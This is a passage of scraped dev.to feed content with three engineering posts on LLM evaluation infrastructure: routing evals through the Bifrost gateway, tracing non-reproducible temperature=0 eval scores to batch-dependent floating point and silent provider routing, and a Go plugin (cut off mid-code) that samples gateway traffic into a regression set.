&lt;p&gt;Bifrost is a gateway. It speaks one OpenAI-compatible API and routes to 23+ providers behind it. We run it self-hosted, Docker, on a single box next to the eval workers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:8080 maximhq/bifrost
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The harness stopped importing vendor SDKs. It points the OpenAI client at &lt;code&gt;localhost:8080/v1&lt;/code&gt; and changes the &lt;code&gt;model&lt;/code&gt; string. That's the whole switch.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;openai&lt;/span&gt;
&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;openai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;OpenAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080/v1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;unused&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;openai/gpt-4o&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;anthropic/claude-sonnet-4-6&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
              &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;bedrock/llama-3.3-70b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;vertex/gemini-2.0&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
              &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;groq/llama-3.3-70b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;eval_set&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;           &lt;span class="c1"&gt;# 1,200 cases
&lt;/span&gt;        &lt;span class="n"&gt;resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;completions&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;record&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The retry and fallback logic moved out of our Python and into the gateway config. One policy, applied to every provider, documented in &lt;a href="https://docs.getbifrost.ai/features/retries-and-fallbacks" rel="noopener noreferrer"&gt;retries and fallbacks&lt;/a&gt;. When Vertex 429s now, it gets the same backoff as every other provider. The eval results stopped carrying our plumbing's personality.&lt;/p&gt;

&lt;h2&gt;
  
  
  What it changed, with numbers
&lt;/h2&gt;

&lt;p&gt;A full sweep is 1,200 cases × 5 models = 6,000 calls. Before, a sweep failed partway maybe one run in three, usually a provider-specific timeout we hadn't normalized. We babysat it.&lt;/p&gt;

&lt;p&gt;After, the gateway's load balancing across multiple API keys per provider cut our 429 retries enough that a clean sweep became the default. We added a second OpenAI key and a second Anthropic key to the config; Bifrost distributes across them. No code change.&lt;/p&gt;

&lt;p&gt;Semantic caching helped less than I'd hoped on first runs and more than I expected on re-runs. Roughly 18% of our cases are near-duplicate prompts (same system prompt, tiny input deltas). &lt;a href="https://docs.getbifrost.ai/features/semantic-caching" rel="noopener noreferrer"&gt;Semantic caching&lt;/a&gt; served those on repeat runs. On a re-run after a rubric tweak, that shaved real wall-clock and provider spend. On a first run, zero benefit. Obvious in hindsight.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it stacks up against the alternatives
&lt;/h2&gt;

&lt;p&gt;We looked at LiteLLM and Portkey first. Both are good. The honest comparison:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concern&lt;/th&gt;
&lt;th&gt;Bifrost&lt;/th&gt;
&lt;th&gt;LiteLLM&lt;/th&gt;
&lt;th&gt;Portkey&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Deployment&lt;/td&gt;
&lt;td&gt;Self-host, Go binary&lt;/td&gt;
&lt;td&gt;Self-host, Python proxy&lt;/td&gt;
&lt;td&gt;Managed SaaS (self-host limited)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenAI-compatible API&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Provider breadth&lt;/td&gt;
&lt;td&gt;23+&lt;/td&gt;
&lt;td&gt;Largest list&lt;/td&gt;
&lt;td&gt;Broad&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-key load balancing&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semantic caching&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;td&gt;Via config&lt;/td&gt;
&lt;td&gt;Strong, managed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Observability UI&lt;/td&gt;
&lt;td&gt;Prometheus + web UI&lt;/td&gt;
&lt;td&gt;Thinner UI&lt;/td&gt;
&lt;td&gt;Best-in-class dashboards&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Governance / virtual keys&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Basic&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you want the widest provider list and you're Python-native already, LiteLLM is the pragmatic pick. If you want a managed dashboard and don't want to run infrastructure, Portkey's observability is ahead of what we self-host. We picked Bifrost because the Go gateway's overhead was low enough to not show up in our latency numbers, and we wanted the whole thing inside our network with no per-call data leaving. &lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;Virtual keys&lt;/a&gt; also let us split eval spend by team, which the billing-minded part of me appreciates.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and Limitations
&lt;/h2&gt;

&lt;p&gt;It's another process to run. If your eval suite only hits one provider, a gateway is pure overhead. Don't add it for a single backend.&lt;/p&gt;

&lt;p&gt;Semantic caching can lie to you in evals. A cached response means you're scoring an old generation, not the current model. We disable caching on any run that's measuring model quality and only enable it for re-scoring runs where the generations are fixed and the rubric changed. If you forget that, you'll report a model improvement that's actually a cache hit.&lt;/p&gt;

&lt;p&gt;The unified API smooths over provider differences you sometimes want to see. Bedrock's stop-reason semantics aren't identical to OpenAI's. The gateway normalizes the response shape, so a few provider-specific fields we used to inspect now need digging. For most eval work that's fine. For debugging a weird truncation, I still drop to the raw provider once in a while.&lt;/p&gt;

&lt;p&gt;And it's young. The community is smaller than LiteLLM's. When I hit an edge case with Vertex auth, there were fewer GitHub issues to crib from. We filed one.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I'd tell my past self
&lt;/h2&gt;

&lt;p&gt;The model swap was never the work. The work was making five providers behave like one so the comparison meant something. A gateway is the boring infrastructure answer, and boring is what you want under an eval harness.&lt;/p&gt;

&lt;p&gt;Run the sweep clean. Hold the plumbing constant. Then argue about the models.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost on GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/retries-and-fallbacks" rel="noopener noreferrer"&gt;Retries and fallbacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/semantic-caching" rel="noopener noreferrer"&gt;Semantic caching&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;Governance and virtual keys&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/quickstart/gateway/setting-up" rel="noopener noreferrer"&gt;Gateway setup guide&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>devops</category>
    </item>
    <item>
      <title>temperature=0 didn't make our LLM evals reproducible</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Tue, 23 Jun 2026 06:31:32 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/temperature0-didnt-make-our-llm-evals-reproducible-5ae6</link>
      <guid>https://dev.to/marcuswwchen/temperature0-didnt-make-our-llm-evals-reproducible-5ae6</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: We set &lt;code&gt;temperature=0&lt;/code&gt; and &lt;code&gt;seed=42&lt;/code&gt; and still got different eval scores on the same 800-prompt suite across runs. The cause wasn't the sampler. It was batch-dependent floating point in the inference engine plus silent provider routing. We chased it for a week. Here's what we found and the three things that actually fixed it.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I lead the eval team at Nexus Labs. We fine-tune small models for enterprise agent automation, and our whole release process hangs on one number: pass rate on an 800-prompt domain suite. Green means ship.&lt;/p&gt;

&lt;p&gt;Two weeks ago the same model, same suite, same code gave us 81.4% on Monday and 79.6% on Wednesday. Nobody touched the weights. That's a 14-prompt swing on a frozen artifact. If your eval moves more than your model improvements, you can't ship on it.&lt;/p&gt;

&lt;h2&gt;
  
  
  temperature=0 is not determinism
&lt;/h2&gt;

&lt;p&gt;First assumption everyone makes: greedy decoding is deterministic. Set temperature to 0, you always pick the argmax token, done.&lt;/p&gt;

&lt;p&gt;It isn't. &lt;code&gt;temperature=0&lt;/code&gt; removes sampling randomness. It does nothing about the fact that the logits themselves change depending on what else is in the batch.&lt;/p&gt;

&lt;p&gt;vLLM (we run 0.6.x) uses continuous batching. Your prompt gets grouped with whatever other requests are in flight. Matrix multiply reductions over a batch of 4 versus a batch of 32 accumulate their floating-point partial sums in a different order, and floating-point addition is not associative. The result is a logit that differs in the 5th decimal place. Usually harmless. But when two candidate tokens are within ~1e-4 of each other, the argmax flips. One flipped token early in a tool-call response cascades into a different JSON structure, which fails our parser, which drops a point.&lt;/p&gt;
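&lt;p&gt;The order dependence is easy to reproduce in plain Python. This is a toy at float64 scale, not vLLM's kernels, where the differences are far larger in half precision. The two token strings and the 0.6 logit are made up for illustration:&lt;/p&gt;

```python
# Floating-point addition is not associative: the same three terms summed
# in two different orders give results one unit in the last place apart.
left_to_right = (0.1 + 0.2) + 0.3   # 0.6000000000000001
right_to_left = 0.1 + (0.2 + 0.3)   # 0.6


def argmax_token(logits):
    # max() keeps the first key on a tie, so dict order acts as the tie-break.
    return max(logits, key=logits.get)


# Hypothetical near-tie between two candidate tokens in a JSON tool call.
run_1 = argmax_token({"}": 0.6, ",": left_to_right})
run_2 = argmax_token({"}": 0.6, ",": right_to_left})

print(left_to_right == right_to_left)  # False
print(run_1, run_2)                    # , }
```

&lt;p&gt;Same inputs, same greedy rule, different token. In a real engine the accumulation order is decided by batch shape and kernel choice instead of by parentheses.&lt;/p&gt;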

&lt;p&gt;So our "deterministic" eval was deterministic per request but not across batch compositions. Run the suite when the cluster is busy, you get a different batch shape, you get a different score.&lt;/p&gt;

&lt;h2&gt;
  
  
  The second source: we didn't know which model answered
&lt;/h2&gt;

&lt;p&gt;The bigger embarrassment. Our eval harness pointed at an internal endpoint that load-balanced across two provider deployments during a migration. About 6% of eval requests were silently hitting a different build of the serving stack with a different quantization. We had no per-request record of which backend served which prompt.&lt;/p&gt;

&lt;p&gt;You can't debug a number you can't attribute. The fix for this half was operational, not numerical: route eval traffic through a gateway that logs the exact provider and model per request. We already run Bifrost (&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;https://github.com/maximhq/bifrost&lt;/a&gt;) in front of our providers for failover, and its per-request logging gave us the backend attribution we'd been missing. LiteLLM does the equivalent; the point is you need the provenance, not a specific logo.&lt;/p&gt;

&lt;p&gt;Once every eval response carried a backend tag, the 6% lit up immediately.&lt;/p&gt;

&lt;h2&gt;
  
  
  What moved the number
&lt;/h2&gt;

&lt;p&gt;We measured each suspected cause by running the 800-prompt suite 20 times and looking at score variance.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Score spread over 20 runs&lt;/th&gt;
&lt;th&gt;Fixed by&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Batch-dependent FP (continuous batching)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;±1.8 pts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pin eval batch size to 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Silent provider routing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;±2.1 pts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-request backend logging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Parser tolerance on whitespace&lt;/td&gt;
&lt;td&gt;&lt;code&gt;±0.9 pts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Normalize before compare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unseeded prompt shuffle in harness&lt;/td&gt;
&lt;td&gt;0 pts (red herring)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The prompt-shuffle thing was where we wasted two days. Order doesn't change per-prompt correctness. We knew that. We checked it anyway because it was easy to check, which is its own lesson about how panic allocates engineering time.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;Three changes. None of them clever.&lt;/p&gt;

&lt;p&gt;First, eval runs go through a dedicated config with batch size pinned. Slower, but reductions happen over a fixed shape every time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# eval-serving.yaml&lt;/span&gt;
&lt;span class="na"&gt;engine&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;max_num_seqs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;        &lt;span class="c1"&gt;# no co-batching during eval&lt;/span&gt;
  &lt;span class="na"&gt;enforce_eager&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;    &lt;span class="c1"&gt;# disable CUDA graph capture variance&lt;/span&gt;
&lt;span class="na"&gt;sampling&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;temperature&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0.0&lt;/span&gt;
  &lt;span class="na"&gt;seed&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;42&lt;/span&gt;
  &lt;span class="na"&gt;top_p&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1.0&lt;/span&gt;
&lt;span class="na"&gt;logging&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;log_backend_id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# which deployment served this request&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;enforce_eager: true&lt;/code&gt; matters more than it looks. CUDA graph capture in vLLM can introduce its own kernel-selection differences across runs. Eager mode is slower, but it removed another &lt;code&gt;±0.4 pts&lt;/code&gt; of spread that we hadn't isolated separately.&lt;/p&gt;

&lt;p&gt;Second, every eval response is stored with the backend identifier and the raw logprobs of the top 2 tokens at each position. When a score moves now, we diff the logprob traces and find the exact prompt and position where decoding diverged. Takes minutes, not days.&lt;/p&gt;
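&lt;p&gt;A minimal sketch of that trace diff, assuming each stored trace is a list of positions and each position holds the top-2 &lt;code&gt;(token, logprob)&lt;/code&gt; pairs, best first. The record layout and the &lt;code&gt;first_divergence&lt;/code&gt; helper are hypothetical names for illustration, not a fixed schema.&lt;/p&gt;

```python
def first_divergence(trace_a, trace_b):
    """Return the first position where the greedy token differs, or None.

    Each trace is a list of positions; each position is a list of
    (token, logprob) pairs sorted best first (hypothetical layout).
    """
    for pos, (a, b) in enumerate(zip(trace_a, trace_b)):
        if a[0][0] != b[0][0]:
            # Margin between top-1 and top-2 in run A: a tiny margin means a
            # near tie that small numeric noise can flip.
            margin_a = a[0][1] - a[1][1]
            return {"position": pos, "a": a[0][0], "b": b[0][0], "margin_a": margin_a}
    return None


# Made-up traces: the two runs agree at position 0 and split at position 1.
run_1 = [[("The", -0.01), ("A", -4.9)], [("cat", -0.69), ("dog", -0.70)]]
run_2 = [[("The", -0.01), ("A", -4.9)], [("dog", -0.68), ("cat", -0.71)]]
print(first_divergence(run_1, run_2))
```

&lt;p&gt;Reporting the top-1 versus top-2 margin alongside the position is a design choice: it separates near-tie flips from cases where the distribution really moved.&lt;/p&gt;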

&lt;p&gt;Third, we report eval scores as a range over 5 runs, not a single number. If the range is wider than 1 point, the result is "inconclusive, rerun," not "regression." We stopped pretending a single float is ground truth.&lt;/p&gt;
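&lt;p&gt;The reporting rule can be sketched as below. The 1-point width check comes from the rule above; treating non-overlapping ranges as a regression is an assumption added for the example, and the scores are made up.&lt;/p&gt;

```python
def score_range(runs):
    """Lowest and highest score across repeated runs."""
    return min(runs), max(runs)


def verdict(baseline, candidate, max_width=1.0):
    b_lo, b_hi = score_range(baseline)
    c_lo, c_hi = score_range(candidate)
    # A range wider than max_width means the measurement itself is too noisy.
    if b_hi - b_lo > max_width or c_hi - c_lo > max_width:
        return "inconclusive, rerun"
    # Assumption: only call it a regression when the ranges do not overlap.
    if b_lo > c_hi:
        return "regression"
    return "no regression detected"


# Illustrative scores over 5 runs each, in points.
baseline = [81.0, 81.4, 81.2, 80.9, 81.3]
candidate = [79.1, 79.6, 79.3, 79.0, 79.4]
print(verdict(baseline, candidate))
```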

&lt;h2&gt;
  
  
  Trade-offs and Limitations
&lt;/h2&gt;

&lt;p&gt;Batch size 1 for eval is expensive. Our 800-prompt suite went from 4 minutes to 19. We accept that because a reproducible eval is worth more than a fast one, but if you run evals on every commit, 19 minutes is a real tax. We gate it: fast batched eval on PRs for a rough signal, pinned eval on release candidates only.&lt;/p&gt;

&lt;p&gt;Pinning &lt;code&gt;enforce_eager&lt;/code&gt; and &lt;code&gt;max_num_seqs: 1&lt;/code&gt; means your eval environment no longer matches production serving conditions. You're measuring the model, not the production system. That's the right call for catching regressions in weights, the wrong call if you're trying to reproduce a user-reported production bug, where batch effects are part of the story.&lt;/p&gt;

&lt;p&gt;And storing top-2 logprobs per position roughly tripled our eval artifact storage. Cheap at our 800-prompt scale. Reconsider it at 100k.&lt;/p&gt;

&lt;p&gt;None of this makes the eval "correct." It makes it reproducible. Those are different problems. A reproducible eval that measures the wrong thing is still wrong, just consistently. The contents of the suite are still the hard part.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.vllm.ai/en/latest/dev/sampling_params.html" rel="noopener noreferrer"&gt;vLLM sampling parameters&lt;/a&gt;: the per-request knobs, including &lt;code&gt;seed&lt;/code&gt; (&lt;code&gt;enforce_eager&lt;/code&gt; and &lt;code&gt;max_num_seqs&lt;/code&gt; are engine arguments, documented separately)
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost AI gateway&lt;/a&gt;: per-request provider logging and failover&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pytorch.org/docs/stable/notes/randomness.html" rel="noopener noreferrer"&gt;Numerical reproducibility in PyTorch&lt;/a&gt;: why CUDA reductions aren't order-stable&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.anyscale.com/blog/continuous-batching-llm-inference" rel="noopener noreferrer"&gt;Continuous batching explained&lt;/a&gt;: the mechanism behind the batch-shape variance&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>Harvesting a regression test set from gateway logs with a plugin</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Mon, 22 Jun 2026 16:01:28 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/harvesting-a-regression-test-set-from-gateway-logs-with-a-plugin-4926</link>
      <guid>https://dev.to/marcuswwchen/harvesting-a-regression-test-set-from-gateway-logs-with-a-plugin-4926</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: Our eval sets went stale because a human wrote the test cases by hand once and never updated them. We moved the capture point into the gateway. A Bifrost custom plugin logs every production request and response, and we curate a weekly regression set from real traffic instead of inventing inputs at our desks.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I lead the fine-tuning and eval team at Nexus Labs. Six people. We ship enterprise agent automation, and the model is the easy part. The hard part is knowing whether last week's change made anything better or quietly broke a customer's workflow.&lt;/p&gt;

&lt;p&gt;For a year our regression suite was 120 hand-written cases. Someone on the team sat down, imagined what a user might ask, and froze it. By month three those inputs looked nothing like what real agents were sending. We were grading ourselves on a test we wrote, not the one production was running.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why the gateway is the right capture point
&lt;/h2&gt;

&lt;p&gt;We route every model call through Bifrost, an open-source AI gateway in front of OpenAI, Anthropic, and our self-hosted vLLM endpoints. It already sees the full request and response for &lt;code&gt;gpt-4o-mini&lt;/code&gt; and our fine-tuned Qwen2.5-7B. That's the natural seam to tap.&lt;/p&gt;

&lt;p&gt;Capturing inside the application means touching every service. Capturing at the gateway means one place. Bifrost ships a custom plugin system, a middleware layer with a pre-hook and a post-hook around each call, documented under &lt;a href="https://docs.getbifrost.ai/enterprise/custom-plugins" rel="noopener noreferrer"&gt;Custom Plugins&lt;/a&gt;. We wrote a plugin that copies request and response into a Postgres table with the model id, latency, and token counts attached.&lt;/p&gt;

&lt;p&gt;Here's the shape of it. Go, because Bifrost is Go.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;EvalCapturePlugin&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;PostHook&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;schemas&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BifrostRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;schemas&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BifrostResponse&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;schemas&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BifrostResponse&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
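    &lt;span class="c"&gt;// guard: skip capture when there is no response or no choice to index&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Choices&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c"&gt;// sample 5% of traffic, skip anything flagged PII&lt;/span&gt;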
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="m"&gt;20&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Meta&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Sensitive&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;queue&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;-&lt;/span&gt; &lt;span class="n"&gt;EvalSample&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
